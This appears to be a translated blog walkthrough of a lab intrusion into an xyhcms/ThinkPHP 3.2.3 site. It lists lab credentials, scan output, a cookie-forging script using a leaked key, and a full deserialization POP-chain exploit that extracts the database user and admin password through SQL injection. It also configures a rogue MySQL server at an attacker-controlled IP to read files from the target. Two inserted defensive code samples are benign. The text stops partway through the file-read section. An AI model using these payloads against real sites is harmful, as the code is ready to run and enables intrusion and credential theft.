scaner: notes on penetrating from the external network into the internal domain

news/2024/5/4 11:10:51 / Source: https://blog.csdn.net/qq_56426046/article/details/128496335

scaner: from the external network to the internal domain

1. Environment setup

1.1 Lab information

Three virtual machines are used: 12server-db, 12-dc and web1.

12server-db and web1 can use either bridged or NAT mode on NIC 1, as needed.

12-dc uses VMnet 19; this machine already has its IP bound.

Hostname   IP                            Account / password
web1       192.168.0.160                 web1 / root@123
db         192.168.0.161, 10.10.10.136   administrator / qweasd666
ad         10.10.10.135                  scaner\administrator / QWEasd000; scaner\db / db123456

web1 site: http://192.168.0.160/xyhai.php?s=/Login/index (admin / 123456qq)

External panel address: http://116.27.231.161:8888/e955a525
Internal panel address: http://192.168.0.160:8888/e955a525
username: m0gy9yes
password: c693d359

MSSQL service on the db host: sa / freepass

1.2 Network topology diagram

2. Gaining a foothold from the external network

2.1 Port scan

nmap -v -sV -A 192.168.0.160

PORT     STATE  SERVICE  VERSION
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   open   http     Apache httpd
|_http-title: \xE6\x88\x91\xE7\x9A\x84\xE7\xBD\x91\xE7\xAB\x99
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: BC2D3C52FF445E759E5EB54AB8239359
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
888/tcp  open   http     Apache httpd
|_http-title: 403 Forbidden
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache
8888/tcp open   http     nginx
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: B351F027909EE2AC274599CE01D004E9
| http-methods: 
|_  Supported Methods: GET POST
Service Info: Host: 0b842aa5.phpmyadmin

2.2 Information gathering

Visiting the ports shows that port 8888 is the Baota (BT) control panel.

Visit port 80.

Several vulnerabilities for this CMS are listed at https://evalshell.com/.

2.3 Scanning the site with gobuster

A quick scan to get the site's directory structure:

gobuster dir -u http://192.168.0.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x '.php' -o dir.txt 
/search               (Status: 200) [Size: 4375]
/archive              (Status: 200) [Size: 5485]
/index                (Status: 200) [Size: 10964]
/home                 (Status: 200) [Size: 10964]
/index.php            (Status: 200) [Size: 10964]
/home.php             (Status: 200) [Size: 10964]
/uploads              (Status: 301) [Size: 300] [--> http://192.168.0.160/uploads/]
/0                    (Status: 200) [Size: 10964]
/go                   (Status: 200) [Size: 0]
/index2               (Status: 200) [Size: 383]
/mobile               (Status: 200) [Size: 7627]
/member               (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/mobile.php           (Status: 200) [Size: 7627]
/Home.php             (Status: 200) [Size: 10964]
/show                 (Status: 200) [Size: 2829]
/Home                 (Status: 200) [Size: 10964]
/special              (Status: 200) [Size: 4444]
/review               (Status: 200) [Size: 0]
/Search               (Status: 200) [Size: 4375]
/Index                (Status: 200) [Size: 10964]
/Archive              (Status: 200) [Size: 5485]
/guestbook            (Status: 200) [Size: 5129]
/avatar               (Status: 301) [Size: 299] [--> http://192.168.0.160/avatar/]
/Public               (Status: 301) [Size: 299] [--> http://192.168.0.160/Public/]
/LICENSE              (Status: 403) [Size: 262]
/Mobile               (Status: 200) [Size: 7627]
/Mobile.php           (Status: 200) [Size: 7627]
/Data                 (Status: 301) [Size: 297] [--> http://192.168.0.160/Data/]
/App                  (Status: 301) [Size: 296] [--> http://192.168.0.160/App/]
/Special              (Status: 200) [Size: 4444]
/Member               (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/Install              (Status: 301) [Size: 300] [--> http://192.168.0.160/Install/]
/Review               (Status: 200) [Size: 0]
/Include              (Status: 301) [Size: 300] [--> http://192.168.0.160/Include/]
/Go                   (Status: 200) [Size: 0]
/Show                 (Status: 200) [Size: 2829]
/Guestbook            (Status: 200) [Size: 5129]
/%3FRID%3D2671        (Status: 200) [Size: 10964]
/%3FRID%3D2671.php    (Status: 200) [Size: 10964]
/Index2               (Status: 200) [Size: 383]
/DAPLICENSE           (Status: 403) [Size: 262]

2.4 Directory listing is enabled

A sensitive directory is browsable:

http://192.168.0.160/App/

2.5 ThinkPHP log directory

http://192.168.0.160/App/Runtime/Logs/Common/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log

2.6 An error page reveals the site path

http://192.168.0.160/App/Runtime/common~runtime.php
Fatal error: Class 'Think\Think' not found in /www/wwwroot/www.xycms.com/App/Runtime/common~runtime.php on line 65

2.7 Captcha recognition + top-100 weak passwords to log into the backend

The information from the vulnerability database is basically all about the admin backend, but the backend is protected by a captcha.

http://192.168.0.160/xyhai.php?s=/Login/index

No captcha-bypass vulnerability was found, so the next test was whether the captcha could be recognised automatically.

Using a recognition tool the captcha can be solved, but during the brute force the IP is automatically banned after more than 10 password attempts.

The plan was to use Burp Suite to spoof the IP for the recognition brute force, but then this code turned up:

The branch where the IP can be spoofed is only entered when $adv is true, so spoofing the IP with Burp Suite will not work.

function get_client_ip($type = 0, $adv = false) {
    $type = $type ? 1 : 0;
    static $ip = NULL;
    if ($ip !== NULL) {
        return $ip[$type];
    }
    if ($adv) {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            $arr = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
            $pos = array_search('unknown', $arr);
            if (false !== $pos) {
                unset($arr[$pos]);
            }
            $ip = trim($arr[0]);
        } elseif (isset($_SERVER['HTTP_CLIENT_IP'])) {
            $ip = $_SERVER['HTTP_CLIENT_IP'];
        } elseif (isset($_SERVER['REMOTE_ADDR'])) {
            $ip = $_SERVER['REMOTE_ADDR'];
        }
    } elseif (isset($_SERVER['REMOTE_ADDR'])) {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    $long = sprintf("%u", ip2long($ip));
    $ip = $long ? array($ip, $long) : array('0.0.0.0', 0);
    return $ip[$type];
}

One could try buying a proxy pool and writing a script that combines it with captcha recognition to continue the brute force.
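As an added example (not xyhcms code), here is the proxy-aware variant of get_client_ip() a defender would want behind a reverse proxy: X-Forwarded-For is honoured only when REMOTE_ADDR is one of a configured set of trusted proxies (a hypothetical placeholder list here), and the chosen address is the right-most hop that is not itself a proxy, so a direct client cannot inject a fake hop to escape the per-IP login lockout.

```php
<?php
// Added example, not xyhcms code. The $adv branch of get_client_ip() above trusts
// X-Forwarded-For from anyone; this variant trusts it only when REMOTE_ADDR is a
// configured reverse proxy and picks the right-most hop that is not itself a proxy,
// so a direct client cannot inject a fake hop to escape the per-IP login lockout.

// Hypothetical placeholder: the reverse proxies that actually sit in front of the app.
$TRUSTED_PROXIES = array('127.0.0.1', '::1');

function client_ip_from_server(array $server, array $trustedProxies) {
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0'; // same sentinel the original returns when ip2long() fails
    }
    // Peer is not a trusted proxy, or there is no forwarded header: the socket peer is the client.
    if (!in_array($remote, $trustedProxies, true) || empty($server['HTTP_X_FORWARDED_FOR'])) {
        return $remote;
    }
    // Walk the chain right to left: hops appended by our own proxies are trustworthy,
    // anything further left (including "unknown" or junk) was supplied by the client.
    $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
    for ($i = count($hops) - 1; $i >= 0; $i--) {
        if (filter_var($hops[$i], FILTER_VALIDATE_IP) === false) {
            return $remote; // malformed hop: fall back to the peer rather than trust the header
        }
        if (!in_array($hops[$i], $trustedProxies, true)) {
            return $hops[$i];
        }
    }
    return $remote; // every hop was one of our proxies; nothing better than the peer
}

// Drop-in for the lockout counter: key the ban on this value, never on the raw header.
function get_client_ip_safe() {
    global $TRUSTED_PROXIES;
    return client_ip_from_server($_SERVER, $TRUSTED_PROXIES);
}
```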

3. xyhcms vulnerability analysis

xyhcms is built on the ThinkPHP 3.2.3 framework, so ThinkPHP's vulnerabilities are present by default. See "Lost CVE: xyhcms (thinkphp3.2.3) deserialization", https://www.freebuf.com/articles/web/264645.html. That author notes the version analysed there is old and that newer versions place site.php in a directory with a random name; but because this site has directory listing enabled,

it can still be reached: 192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php

P4tzizR6d is the value of CFG_COOKIE_ENCODE, the cookie encryption key. Download the source to analyse it.

The version analysed is xyhcms_v3.6_20210602.

3.1 Login encryption analysis

App/Common/Common/function.php

function get_cookie($name, $key = '') {
    if (!isset($_COOKIE[$name])) {
        return null;
    }
    $key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;
    $value = $_COOKIE[$name];
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_decrypt($value);
    return unserialize($value);
}

/**
 * Set a cookie
 *
 * @param array $args
 * @return boolean
 */
// Change the key $key when using this; for anything involving payment settlement, redesign the cookie storage format
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {
    $key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;
    $name = $args['name'];
    $expire = isset($args['expire']) ? $args['expire'] : null;
    $path = isset($args['path']) ? $args['path'] : '/';
    $domain = isset($args['domain']) ? $args['domain'] : null;
    $secure = isset($args['secure']) ? $args['secure'] : 0;
    $value = serialize($args['value']);
    $key = md5($key);
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value);
    //setcookie($cookieName ,$cookie, time()+3600,'/','',false);
    return setcookie($name, $value, $expire, $path, $domain, $secure); // expiry: 0 means the cookie expires when the browser closes
}

The get_cookie function calls unserialize, so deserialization can be used to reach a POP chain. The two functions are annotated below.

function get_cookie($name, $key = '') { // takes the cookie name and the encryption key, which defaults to empty
    if (!isset($_COOKIE[$name])) { // if the cookie has no value return null, otherwise continue
        return null;
    }
    $key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key; // this key is read from site.php
    $value = $_COOKIE[$name]; // get the cookie value
    $key = md5($key); // md5 the key
    $sc = new \Common\Lib\SysCrypt($key); // pass it to the class constructor
    $value = $sc->php_decrypt($value); // call php_decrypt in the class to decrypt
    return unserialize($value); // unserialize the decrypted content
}

It is called from quite a few places.

Next, look at how the value is set.

function set_cookie($args, $key = '') {
    $key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key; // get the key; in the local test its value is J8qp9z2vj
    $name = $args['name']; // get the name
    $expire = isset($args['expire']) ? $args['expire'] : null;
    $path = isset($args['path']) ? $args['path'] : '/';
    $domain = isset($args['domain']) ? $args['domain'] : null;
    $secure = isset($args['secure']) ? $args['secure'] : 0;
    $value = serialize($args['value']); // the value is serialized here
    $key = md5($key); // md5 the key
    $sc = new \Common\Lib\SysCrypt($key);
    $value = $sc->php_encrypt($value); // encrypt
    //setcookie($cookieName ,$cookie, time()+3600,'/','',false);
    return setcookie($name, $value, $expire, $path, $domain, $secure); // expiry: 0 means the cookie expires when the browser closes
}

Now look at SysCrypt->php_encrypt:

namespace Common\Lib;

class SysCrypt {
    private $crypt_key;

    // constructor
    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }

    public function php_encrypt($txt) { // input value
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; // cycle through the per-message key
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key)); // apply crypt_key, then return base64
    }

    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this->crypt_key = null;
    }
}
/*
$sc = new SysCrypt('phpwms');
$text = '110';
print($sc -> php_encrypt($text));
print('<br>');
print($sc -> php_decrypt($sc -> php_encrypt($text)));
*/
?>

VHtVZwQ1VT9SdghoAWxTOF9kBndUMgBmU38Abg== is the value of the nickname cookie after logging in.

To decrypt it, build a standalone encrypt/decrypt script from the code:

<?php
class SysCrypt {
    private $crypt_key;

    // constructor
    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }

    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }

    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this->crypt_key = null;
    }
}

/**
 * Get the value of the given cookie
 *
 * @param string $name
 */
//function get_cookie($name, $key = '@^%$y5fbl') {
function get_cookie($name, $key = '') {
    $key = 'J8qp9z2vj';
    $value = $name;
    $key = md5($key);
    $sc = new SysCrypt($key);
    $value = $sc->php_decrypt($value);
    return unserialize($value);
}

/**
 * Set a cookie
 *
 * @param array $args
 * @return boolean
 */
// Change the key $key when using this; for anything involving payment settlement, redesign the cookie storage format
//function set_cookie($args , $key = '@^%$y5fbl') {
function set_cookie($args, $key = '') {
    $key = 'J8qp9z2vj';
    $value = serialize($args);
    $key = md5($key);
    $sc = new SysCrypt($key);
    $value = $sc->php_encrypt($value);
    return $value;
    //setcookie($cookieName ,$cookie, time()+3600,'/','',false);
    // return setcookie($name, $value, $expire, $path, $domain, $secure); // expiry: 0 means the cookie expires when the browser closes
}

// test encryption
echo set_cookie('moonsec');
// test decryption
echo get_cookie('AywIOgMyCWNSdgxsBGkAawU+BncAZgRiDiJTPQ==');
?>

The source shows that the logged-in identity is read from the cookie. To confirm the encryption is reproduced correctly, first construct a value for "hacker", then replace the cookie and check whether it shows up on the page.

XXIBM1JiVD4EIApvBGcHYFVrC2wBcFN0BjM= decrypts to hacker.

This proves the encryption scheme has been reproduced correctly.
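As an added example (not xyhcms code), here is what a fixed version of the set_cookie()/get_cookie() pair above looks like: the value is stored as JSON and authenticated with an HMAC derived from CFG_COOKIE_ENCODE, the MAC is checked with hash_equals() before anything is parsed, and unserialize() is gone entirely, so a cookie holding a serialized Imagick/Memcache/Model chain is simply rejected. The helper names are mine and it targets PHP 5.6+ to match the environment on this page.

```php
<?php
// Added example, not xyhcms code: a signed replacement for set_cookie()/get_cookie().
// Assumes CFG_COOKIE_ENCODE (the site secret from site.php) is still the only secret,
// but derives a dedicated MAC key from it and stores JSON rather than serialize() output,
// so the read path never calls unserialize() on attacker-controlled bytes. PHP 5.6+.

function cookie_mac_key($siteKey) {
    // Domain-separated key: even if the site secret is reused elsewhere, this MAC key is distinct.
    return hash_hmac('sha256', 'xyhcms-cookie-mac-v1', $siteKey, true);
}

function b64url_encode($raw) {
    return rtrim(strtr(base64_encode($raw), '+/', '-_'), '=');
}

function b64url_decode($s) {
    return base64_decode(strtr($s, '-_', '+/'), true); // strict: false on any non-alphabet byte
}

// Replaces set_cookie(): value is JSON + HMAC-SHA256, not SysCrypt(serialize(value)).
function set_cookie_signed(array $args, $siteKey) {
    $expire = isset($args['expire']) ? (int)$args['expire'] : 0;
    $payload = json_encode(array('v' => $args['value'], 'exp' => $expire));
    if ($payload === false) {
        return false; // non-UTF-8 or unencodable value: refuse rather than emit a broken cookie
    }
    $body = b64url_encode($payload);
    $mac  = hash_hmac('sha256', $body, cookie_mac_key($siteKey));
    $path   = isset($args['path']) ? $args['path'] : '/';
    $domain = isset($args['domain']) ? $args['domain'] : '';
    $secure = !empty($args['secure']);
    // httponly=true: the nmap output above flagged PHPSESSID without it; app cookies need it too.
    return setcookie($args['name'], $body . '.' . $mac, $expire, $path, $domain, $secure, true);
}

// Replaces get_cookie(): verify first, parse second, never unserialize().
function get_cookie_signed($name, $siteKey) {
    if (!isset($_COOKIE[$name]) || !is_string($_COOKIE[$name])) {
        return null;
    }
    return verify_signed_cookie($_COOKIE[$name], $siteKey, time());
}

// Pure helper so the logic can be exercised without $_COOKIE.
function verify_signed_cookie($cookie, $siteKey, $now) {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) {
        return null;
    }
    list($body, $mac) = $parts;
    $expected = hash_hmac('sha256', $body, cookie_mac_key($siteKey));
    if (!hash_equals($expected, $mac)) {
        return null; // forged or tampered: reject before touching the payload
    }
    $raw = b64url_decode($body);
    if ($raw === false) {
        return null;
    }
    $data = json_decode($raw, true); // assoc arrays only; JSON cannot instantiate PHP objects
    if (!is_array($data) || !array_key_exists('v', $data)) {
        return null;
    }
    if (!empty($data['exp']) && $data['exp'] < $now) {
        return null; // expired cookies are rejected server-side, not only by the browser
    }
    return $data['v'];
}
```

Rotating CFG_COOKIE_ENCODE after a leak like the one in section 3 invalidates every issued cookie at once, because the MAC key is derived from it.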

3.2 ThinkPHP 3.2.3 deserialization vulnerability

ThinkPHP 3.2.3 has a known deserialization vulnerability, already analysed at https://xz.aliyun.com/t/9441. The unserialize call in xyhcms's get_cookie is the trigger point: generate the serialized payload, encrypt it with set_cookie, and use the resulting ciphertext as the cookie.

First, walk through the general flow in ThinkPHP 3.2.3: look for __destruct methods in classes and follow the call chain from there.

Include/Library/Think/Image/Driver/Imagick.class.php

    public function __destruct() {
        empty($this->img) || $this->img->destroy(); // $this->img is controllable
    }

Next, find which class's destroy() gets called. Only two classes have a destroy method:

Include/Library/Think/Session/Driver/Memcache.class.php
Include/Library/Think/Session/Driver/Db.class.php

Focus on Memcache.class.php:

    public function destroy($sessID) {
        return $this->handle->delete($this->sessionName . $sessID);
    }

destroy($sessID) takes a parameter; on PHP 7.0 and above this raises a fatal error and the code does not run, while on 5.6 it only warns and still executes. Next, find which class's delete method $this->handle->delete resolves to: Include/Library/Think/Model.class.php

    public function delete($options = array()) {
        $pk = $this->getPk();
        if (empty($options) && empty($this->options['where'])) {
            // if the delete condition is empty, delete the record corresponding to the current data object
            if (!empty($this->data) && isset($this->data[$pk])) {
                return $this->delete($this->data[$pk]);
            } else {
                return false;
            }
        }
        if (is_numeric($options) || is_string($options)) {
            // delete records by primary key
            if (strpos($options, ',')) {
                $where[$pk] = array('IN', $options);
            } else {
                $where[$pk] = $options;
            }
            $options          = array();
            $options['where'] = $where;
        }
        // delete records by composite primary key
        if (is_array($options) && (count($options) > 0) && is_array($pk)) {
            $count = 0;
            foreach (array_keys($options) as $key) {
                if (is_int($key)) {
                    $count++;
                }
            }
            if ($count == count($pk)) {
                $i = 0;
                foreach ($pk as $field) {
                    $where[$field] = $options[$i];
                    unset($options[$i++]);
                }
                $options['where'] = $where;
            } else {
                return false;
            }
        }
        // parse the expression
        $options = $this->_parseOptions($options);
        if (empty($options['where'])) {
            // if the condition is empty, do not delete unless 1=1 is set
            return false;
        }
        //!is_array($pk) new add by gosea--20171016 -- composite primary key error
        if (!is_array($pk) && is_array($options['where']) && isset($options['where'][$pk])) {
            $pkValue = $options['where'][$pk];
        }
        if (false === $this->_before_delete($options)) {
            return false;
        }
        $result = $this->db->delete($options);
        if (false !== $result && is_numeric($result)) {
            $data = array();
            if (isset($pkValue)) {
                $data[$pk] = $pkValue;
            }
            $this->_after_delete($data, $options);
        }
        // return the number of deleted records
        return $result;
    }

The key line is 539: $result = $this->db->delete($options); here db can be any injected object, so the delete method of any class can be invoked.

Include/Library/Think/Db/Driver.class.php

    public function delete($options = array()) {
        $this->model = $options['model'];
        $this->parseBind(!empty($options['bind']) ? $options['bind'] : array());
        $table = $this->parseTable($options['table']); // the contents of the table key are taken here
        $sql = 'DELETE FROM ' . $table;
        if (strpos($table, ',')) {
            // multi-table delete supports USING and JOIN
            if (!empty($options['using'])) {
                $sql .= ' USING ' . $this->parseTable($options['using']) . ' ';
            }
            $sql .= $this->parseJoin(!empty($options['join']) ? $options['join'] : '');
        }
        $sql .= $this->parseWhere(!empty($options['where']) ? $options['where'] : '');
        if (!strpos($table, ',')) {
            // single-table delete supports order and limit
            $sql .= $this->parseOrder(!empty($options['order']) ? $options['order'] : '')
                  . $this->parseLimit(!empty($options['limit']) ? $options['limit'] : '');
        }
        $sql .= $this->parseComment(!empty($options['comment']) ? $options['comment'] : '');
        return $this->execute($sql, !empty($options['fetch_sql']) ? true : false);
    }

Following execute leads to $this->initConnect(true);

    /**
     * Initialise the database connection
     * @access protected
     * @param boolean $master master server
     * @return void
     */
    protected function initConnect($master = true) {
        if (!empty($this->config['deploy']))
            // distributed database
            $this->_linkID = $this->multiConnect($master);
        else
            // default single database
            if (!$this->_linkID) $this->_linkID = $this->connect();
    }

Following $this->connect():

    public function connect($config = '', $linkNum = 0, $autoConnection = false) {
        if (!isset($this->linkID[$linkNum])) {
            if (empty($config)) $config = $this->config;
            try {
                if (empty($config['dsn'])) {
                    $config['dsn'] = $this->parseDsn($config);
                }
                if (version_compare(PHP_VERSION, '5.3.6', '<=')) {
                    // disable emulated prepared statements
                    $this->options[PDO::ATTR_EMULATE_PREPARES] = false;
                }
                $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options);
            } catch (\PDOException $e) {
                if ($autoConnection) {
                    trace($e->getMessage(), '', 'ERR');
                    return $this->connect($autoConnection, $linkNum);
                } else {
                    E($e->getMessage());
                }
            }
        }
        return $this->linkID[$linkNum];
    }

$this->config is the driver's configuration array:

    protected $config = array(
        'type'           => '',          // database type
        'hostname'       => '127.0.0.1', // server address
        'database'       => '',          // database name
        'username'       => '',          // username
        'password'       => '',          // password
        'hostport'       => '',          // port
        'dsn'            => '',
        'params'         => array(),     // connection parameters
        'charset'        => 'utf8',      // database charset, utf8 by default
        'prefix'         => '',          // table prefix
        'debug'          => false,       // database debug mode
        'deploy'         => 0,           // deployment mode: 0 centralised (single server), 1 distributed (master/slave)
        'rw_separate'    => false,       // read/write splitting, only for master/slave
        'master_num'     => 1,           // number of master servers after read/write splitting
        'slave_no'       => '',          // specified slave server number
        'db_like_fields' => '',
    );

The database connection is made through PDO:

                $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options);
            } catch (\PDOException $e) {
                if ($autoConnection) {
                    trace($e->getMessage(), '', 'ERR');
                    return $this->connect($autoConnection, $linkNum);
                } else {
                    E($e->getMessage());
                }

Driver is an abstract class and must be inherited to be used.

Mysql is chosen, so this runs:

    public function insertAll($dataSet, $options = array(), $replace = false) {
        $values = array();
        $this->model = $options['model'];
        if (!is_array($dataSet[0])) return false;
        $this->parseBind(!empty($options['bind']) ? $options['bind'] : array());
        $fields = array_map(array($this, 'parseKey'), array_keys($dataSet[0]));
        foreach ($dataSet as $data) {
            $value = array();
            foreach ($data as $key => $val) {
                if (is_array($val) && 'exp' == $val[0]) {
                    $value[] = $val[1];
                } elseif (is_scalar($val)) {
                    if (0 === strpos($val, ':') && in_array($val, array_keys($this->bind))) {
                        $value[] = $this->parseValue($val);
                    } else {
                        $name = count($this->bind);
                        $value[] = ':' . $name;
                        $this->bindParam($name, $val);
                    }
                }
            }
            $values[] = '(' . implode(',', $value) . ')';
        }
        $sql = ($replace ? 'REPLACE' : 'INSERT') . ' INTO ' . $this->parseTable($options['table']) . ' (' . implode(',', $fields) . ') VALUES ' . implode(',', $values);
        $sql .= $this->parseComment(!empty($options['comment']) ? $options['comment'] : '');
        return $this->execute($sql, !empty($options['fetch_sql']) ? true : false);
    }

$this->execute still goes to the parent class's execute in Driver.class.php.

3.3 Writing the ThinkPHP 3.2.3 POP chain

Exploit code can be found at https://www.freebuf.com/articles/web/264645.html and https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA.

They are all much the same and can be used as they are.

First add an entry point to make debugging easier; of course, you can also just fire the exploit directly.

<?php
namespace Home\Controller;

class Index2Controller extends HomeCommonController {
    // method: index
    public function index() {
        unserialize(base64_decode($_GET['id']));
        //    echo get_cookie('email');
        $this->display();
    }
}

The POP chain exploit, used as-is:

<?php
namespace Think\Image\Driver;
use Think\Session\Driver\Memcache;

class Imagick {
    private $img;
    public function __construct() {
        $this->img = new Memcache();
    }
}

namespace Think\Session\Driver;
use Think\Model;

class Memcache {
    protected $handle;
    public function __construct() {
        $this->sessionName = null;
        $this->handle = new Model();
    }
}

namespace Think;
use Think\Db\Driver\Mysql;

class Model {
    protected $pk;
    protected $options;
    protected $data;
    protected $db;
    public function __construct() {
        $this->options['where'] = '';
        $this->pk = 'jiang';
        $this->data[$this->pk] = array(
            "table" => "mysql.user where 1=updatexml(1,concat(0x7e,user()),1)#",
            "where" => "1=1"
        );
        $this->db = new Mysql();
    }
}

namespace Think\Db\Driver;
use PDO;

class Mysql {
    protected $options;
    protected $config;
    public function __construct() {
        $this->options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true); // must be enabled to read files
        $this->config = array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
    }
}

use Think\Image\Driver\Imagick;
echo base64_encode(serialize(new Imagick()));
http://www.xycms3.com/?s=home/index2&id=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

In the debugger, root is already shown, but it does not appear on the page; it is recorded in the log, though.

Retrieving the password:

<?php
namespace Think\Image\Driver;
use Think\Session\Driver\Memcache;

class Imagick {
    private $img;
    public function __construct() {
        $this->img = new Memcache();
    }
}

namespace Think\Session\Driver;
use Think\Model;

class Memcache {
    protected $handle;
    public function __construct() {
        $this->sessionName = null;
        $this->handle = new Model();
    }
}

namespace Think;
use Think\Db\Driver\Mysql;

class Model {
    protected $pk;
    protected $options;
    protected $data;
    protected $db;
    public function __construct() {
        $this->options['where'] = '';
        $this->pk = 'jiang';
        $this->data[$this->pk] = array(
            "table" => "mysql.user where 1=updatexml(1,(select password from xyh_admin limit 1),1)#",
            "where" => "1=1"
        );
        $this->db = new Mysql();
    }
}

namespace Think\Db\Driver;
use PDO;

class Mysql {
    protected $options;
    protected $config;
    public function __construct() {
        $this->options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true); // must be enabled to read files
        $this->config = array(
            "debug"    => 1,
            "database" => "mysql",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
    }
}

use Think\Image\Driver\Imagick;
echo base64_encode(serialize(new Imagick()));

Back to the target: first we need the target's MySQL account and password, which can be obtained through a MySQL remote file read.

3.4 ThinkPHP 3.2.3 file read

Download https://github.com/allyshka/Rogue-MySql-Server

Point the exploit's database connection at that IP:

<?php
namespace Think\Db\Driver;
use PDO;

class Mysql {
    protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);
    protected $config = array(
        "dsn"      => "mysql:host=192.168.0.168;dbname=xyhcms;port=3307",
        "username" => "root",
        "password" => "root"
    );
}

namespace Think;

class Model {
    protected $options = array();
    protected $pk;
    protected $data = array();
    protected $db = null;
    public function __construct() {
        $this->db = new \Think\Db\Driver\Mysql();
        $this->options['where'] = '';
        $this->pk = 'luoke';
        $this->data[$this->pk] = array("table" => "xyh_admin_log", "where" => "id=0");
    }
}

namespace Think\Session\Driver;

class Memcache {
    protected $handle;
    public function __construct() {
        $this->handle = new \Think\Model();
    }
}

namespace Think\Image\Driver;

class Imagick {
    private $img;
    public function __construct() {
        $this->img = new \Think\Session\Driver\Memcache();
    }
}

namespace Common\Lib;

class SysCrypt {
    private $crypt_key;

    public function __construct($crypt_key) {
        $this->crypt_key = $crypt_key;
    }

    public function php_encrypt($txt) {
        srand((double)microtime() * 1000000);
        $encrypt_key = md5(rand(0, 32000));
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $encrypt_key[$ctr] . ($txt[$i] ^ $encrypt_key[$ctr++]);
        }
        return base64_encode(self::__key($tmp, $this->crypt_key));
    }

    public function php_decrypt($txt) {
        $txt = self::__key(base64_decode($txt), $this->crypt_key);
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $md5 = $txt[$i];
            $tmp .= $txt[++$i] ^ $md5;
        }
        return $tmp;
    }

    private function __key($txt, $encrypt_key) {
        $encrypt_key = md5($encrypt_key);
        $ctr = 0;
        $tmp = '';
        for ($i = 0; $i < strlen($txt); $i++) {
            $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
            $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
        }
        return $tmp;
    }

    public function __destruct() {
        $this->crypt_key = null;
    }
}

